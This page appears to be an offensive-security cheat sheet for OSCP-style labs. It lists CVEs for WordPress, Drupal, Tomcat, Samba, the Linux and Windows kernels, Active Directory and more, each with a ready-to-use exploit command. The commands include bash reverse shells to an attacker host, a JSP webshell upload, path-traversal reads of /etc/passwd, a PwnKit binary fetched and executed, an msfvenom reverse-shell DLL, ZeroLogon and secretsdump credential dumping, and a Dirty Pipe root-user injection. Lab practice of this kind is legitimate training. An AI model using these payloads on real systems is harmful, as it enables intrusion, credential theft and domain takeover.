CVE Database

Known vulnerabilities commonly encountered on OSCP-style boxes, Proving Grounds, and HackTheBox. Organized by category with version ranges, PoC links, and quick usage examples.

How to use this page:

  1. Identify the service and version on your target
  2. Find it in the table below
  3. Follow the PoC link or use the command provided

Always check SearchSploit first:

searchsploit <service> <version>
searchsploit -m <exploit_id>    # Mirror exploit to current directory

WEB APPLICATIONS

WordPress

CVEAffected VersionDescriptionPoC
CVE-2020-25213WP File Manager < 6.9Unauthenticated file upload RCEGitHub
CVE-2021-24145Modern Events Calendar < 5.16.5Authenticated file upload RCEExploitDB
CVE-2022-0739BookingPress < 1.0.11Unauthenticated SQLiGitHub
CVE-2023-2732MStore API < 3.9.3Authentication bypassWPScan
# CVE-2020-25213 — WP File Manager unauthenticated upload
curl -F 'cmd=upload' -F 'target=l1_Lw' \
  -F 'upload[]=@shell.php' \
  http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
# Shell at: http://$IP/wp-content/plugins/wp-file-manager/lib/files/shell.php

Drupal

CVEAffected VersionDescriptionPoC
CVE-2018-7600Drupal < 7.58 / < 8.3.9Drupalgeddon2 — Unauthenticated RCEGitHub
CVE-2018-7602Drupal < 7.59 / < 8.5.3Drupalgeddon3 — Authenticated RCEGitHub
CVE-2019-6340Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10REST module deserialization RCEGitHub
# CVE-2018-7600 — Drupalgeddon2 (most common)
python3 drupalgeddon2.py http://$IP/

# Metasploit:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS $IP
run

Joomla

CVEAffected VersionDescriptionPoC
CVE-2015-8562Joomla 1.5 - 3.4.5Object injection RCE via HTTP headersGitHub
CVE-2017-8917Joomla 3.7.0SQLi in com_fieldsGitHub
CVE-2023-23752Joomla 4.0.0 - 4.2.7Unauthenticated information disclosureGitHub
# CVE-2023-23752 — Information disclosure (leaks DB creds)
curl -s "http://$IP/api/index.php/v1/config/application?public=true" | python3 -m json.tool

# CVE-2017-8917 — SQLi
sqlmap -u "http://$IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 -p list[fullordering] --dbs

Apache Tomcat

CVEAffected VersionDescriptionPoC
CVE-2017-12617Tomcat 7.0.0-7.0.81 / 8.5.0-8.5.22PUT method RCE via JSP uploadGitHub
CVE-2020-1938Tomcat < 9.0.31 / < 8.5.51 / < 7.0.100Ghostcat — AJP file read/RCEGitHub
CVE-2019-0232Tomcat 7/8/9 on Windows with CGICGI servlet command injectionExploitDB
# CVE-2020-1938 — Ghostcat (AJP port 8009)
python3 ajpShooter.py http://$IP:8009 /WEB-INF/web.xml read

# CVE-2017-12617 — PUT method JSP upload
curl -X PUT "http://$IP:8080/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'

CMS Made Simple

CVEAffected VersionDescriptionPoC
CVE-2019-9053CMSMS < 2.2.10Blind SQLi — Dumps admin credentialsGitHub
python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt

GitLab

CVEAffected VersionDescriptionPoC
CVE-2021-22205GitLab 11.9 - 13.10.2Unauthenticated RCE via image uploadGitHub
CVE-2023-7028GitLab 16.1 - 16.7.1Account takeover via password resetGitHub
# CVE-2021-22205 — Unauthenticated RCE
python3 CVE-2021-22205.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

Grafana

CVEAffected VersionDescriptionPoC
CVE-2021-43798Grafana 8.0.0 - 8.3.0Unauthenticated arbitrary file readGitHub
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# Grab the database:
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db

Jenkins

CVEAffected VersionDescriptionPoC
CVE-2024-23897Jenkins < 2.442 / LTS < 2.426.3Arbitrary file read via CLIGitHub
CVE-2019-1003000Script Security Plugin < 1.49Sandbox bypass RCEExploitDB
CVE-2018-1000861Jenkins < 2.154 / LTS < 2.138.4Unauthenticated RCEGitHub
# CVE-2024-23897 — File read via CLI
java -jar jenkins-cli.jar -s http://$IP:8080/ help "@/etc/passwd"

Webmin

CVEAffected VersionDescriptionPoC
CVE-2019-15107Webmin 1.890 - 1.920Unauthenticated RCE via password_change.cgiGitHub
CVE-2012-2982Webmin < 1.590Authenticated RCE via file managerExploitDB
# CVE-2019-15107 — Unauthenticated RCE
curl -sk "https://$IP:10000/password_change.cgi" \
  -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'

WebLogic

CVEAffected VersionDescriptionPoC
CVE-2020-14882WebLogic 10.3.6 / 12.x / 14.xUnauthenticated RCEGitHub
CVE-2019-2725WebLogic 10.3.6 / 12.1.3Deserialization RCEGitHub
# CVE-2020-14882 — WebLogic unauthenticated RCE
curl "http://$IP:7001/console/css/%252e%252e%252fconsole.portal" \
  -H "cmd: id"

Magento

CVEAffected VersionDescriptionPoC
CVE-2015-1397Magento < 1.9.2.0Shoplift SQLi — Create admin accountExploitDB
CVE-2022-24086Magento 2.3.x / 2.4.xTemplate injection RCEGitHub
# CVE-2015-1397 — Shoplift (creates admin: forme/forme)
python2 shoplift.py http://$IP/

NETWORK SERVICES

FTP

CVEAffected VersionDescriptionPoC
CVE-2011-2523vsftpd 2.3.4Backdoor — Shell on port 6200Metasploit
CVE-2015-3306ProFTPD 1.3.5mod_copy — Unauthenticated file copyExploitDB
CVE-2019-12815ProFTPD < 1.3.5b / 1.3.6mod_copy arbitrary file copyExploitDB
# vsftpd 2.3.4 backdoor
nc $IP 21
USER test:)
PASS test
# Then: nc $IP 6200

# ProFTPD mod_copy
nc $IP 21
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/passwd.txt

SMB / Samba

CVEAffected VersionDescriptionPoC
MS17-010Windows XP - Server 2016EternalBlue — Unauthenticated RCEGitHub
CVE-2017-7494Samba 3.5.0 - 4.6.4SambaCry — RCE via writable shareMetasploit
MS08-067Windows XP / Server 2003 / Vista / 2008NetAPI RCE — Classic exploitGitHub
# MS17-010 — EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 $IP
# Metasploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run

# CVE-2017-7494 — SambaCry
use exploit/linux/samba/is_known_pipename
set RHOSTS $IP
run

SSH

CVEAffected VersionDescriptionPoC
CVE-2018-15473OpenSSH < 7.7Username enumerationGitHub
CVE-2016-20012OpenSSH < 8.2Banner-based user enumerationExploitDB
# CVE-2018-15473 — Username enumeration
python3 ssh_enum.py $IP -U users.txt
# Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers

SMTP

CVEAffected VersionDescriptionPoC
CVE-2019-10149Exim 4.87 - 4.91"Return of the WIZard" — Unauthenticated RCEGitHub
CVE-2017-7692SquirrelMail < 1.4.22Authenticated RCEExploitDB
# CVE-2019-10149 — Exim RCE
python3 raptor_exim_wiz.py -t $IP -p 25 -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

WEB SERVERS

Apache

CVEAffected VersionDescriptionPoC
CVE-2014-6271Bash (via Apache CGI)Shellshock — RCE via HTTP headersExploitDB
CVE-2021-41773Apache 2.4.49Path traversal + RCEGitHub
CVE-2021-42013Apache 2.4.50Path traversal + RCE (bypass of 41773 fix)GitHub
# Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh

# CVE-2021-41773 — Apache path traversal + RCE
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/bash" -d 'echo; id'

IIS

CVEAffected VersionDescriptionPoC
CVE-2017-7269IIS 6.0 (Windows Server 2003)WebDAV buffer overflow RCEGitHub
MS15-034IIS (HTTP.sys)Integer overflow — DoS / info disclosureExploitDB
# CVE-2017-7269 — IIS 6.0 WebDAV
python2 iis6_exploit.py $IP 80 $LHOST 4444
# Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl

LINUX PRIVILEGE ESCALATION

CVEAffected VersionDescriptionPoC
CVE-2016-5195Linux Kernel < 4.8.3Dirty COW — Write to read-only filesGitHub
CVE-2021-4034Polkit (all major distros)PwnKit — pkexec local rootGitHub
CVE-2021-3156Sudo 1.8.2 - 1.9.5p1Baron Samedit — Heap overflow rootGitHub
CVE-2022-0847Linux Kernel 5.8 - 5.16.11Dirty Pipe — Overwrite read-only filesGitHub
CVE-2022-2588Linux Kernel < 5.19Route4 use-after-free local rootGitHub
CVE-2023-0386Linux Kernel < 6.2OverlayFS privilege escalationGitHub
CVE-2023-32233Linux Kernel < 6.4Netfilter nf_tables local rootGitHub
# PwnKit (CVE-2021-4034) — Works on almost every unpatched Linux
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

# Dirty COW (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword

# Baron Samedit (CVE-2021-3156)
# Check if vulnerable:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# Exploit:
python3 CVE-2021-3156.py

# Dirty Pipe (CVE-2022-0847)
gcc exploit.c -o exploit
./exploit /etc/passwd 1 $'\npiped:$1$piped$password:0:0::/root:/bin/bash\n'
su piped  # password: password

WINDOWS PRIVILEGE ESCALATION

CVEAffected VersionDescriptionPoC
CVE-2020-0787Windows 10 / Server 2016-2019BITS arbitrary file write → SYSTEMGitHub
CVE-2020-1472Windows Server (Netlogon)ZeroLogon — Domain admin in secondsGitHub
CVE-2021-1675Windows (Print Spooler)PrintNightmare — LPE / RCE to SYSTEMGitHub
CVE-2021-36934Windows 10 (1809+)HiveNightmare — Read SAM as userGitHub
CVE-2022-26923AD Certificate ServicesCertifried — Domain user to DAGitHub
MS16-032Windows 7/8/10 / Server 2008-2012Secondary Logon handle privescExploitDB
MS16-098Windows 8.1 / Server 2012Kernel exploit via RGNOBJExploitDB
# PrintNightmare (CVE-2021-1675)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'

# ZeroLogon (CVE-2020-1472) — Resets DC machine password
python3 zerologon_tester.py DC_NAME $DC_IP
python3 cve-2020-1472-exploit.py DC_NAME $DC_IP
impacket-secretsdump -no-pass -just-dc domain.local/DC_NAME\$@$DC_IP

# HiveNightmare (CVE-2021-36934) — Copy SAM as regular user
icacls C:\Windows\System32\config\SAM
# If readable:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# MS16-032
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

ACTIVE DIRECTORY

CVEAffected VersionDescriptionPoC
CVE-2020-1472Windows Server (Netlogon)ZeroLogon — Reset DC machine accountGitHub
CVE-2021-1675Windows (Print Spooler)PrintNightmare — RCE as SYSTEMGitHub
CVE-2021-42278 + CVE-2021-42287AD (all versions)noPac — Domain user to DAGitHub
CVE-2022-26923AD Certificate ServicesCertifried — Machine account to DAGitHub
# noPac (CVE-2021-42278 + CVE-2021-42287) — User to DA
python3 noPac.py domain.local/user:'password' -dc-ip $DC_IP -dc-host DC01 --impersonate administrator -dump

# Certifried (CVE-2022-26923) — Via AD CS
certipy account create -u user@domain.local -p 'password' -dc-ip $DC_IP -user machine$ -dns dc.domain.local
certipy req -u machine$@domain.local -p 'password' -dc-ip $DC_IP -ca CORP-CA -template Machine
certipy auth -pfx dc.pfx -dc-ip $DC_IP

QUICK LOOKUP WORKFLOW

When you find a service version, follow this process:

1. searchsploit <service> <version>        → Local exploit database
2. Google: "<service> <version> exploit"    → Recent PoCs
3. Check this page                          → Curated OSCP-relevant CVEs
4. GitHub search: "CVE-YYYY-XXXXX"         → Find PoC repos
5. HackTricks: book.hacktricks.wiki        → Methodology + exploits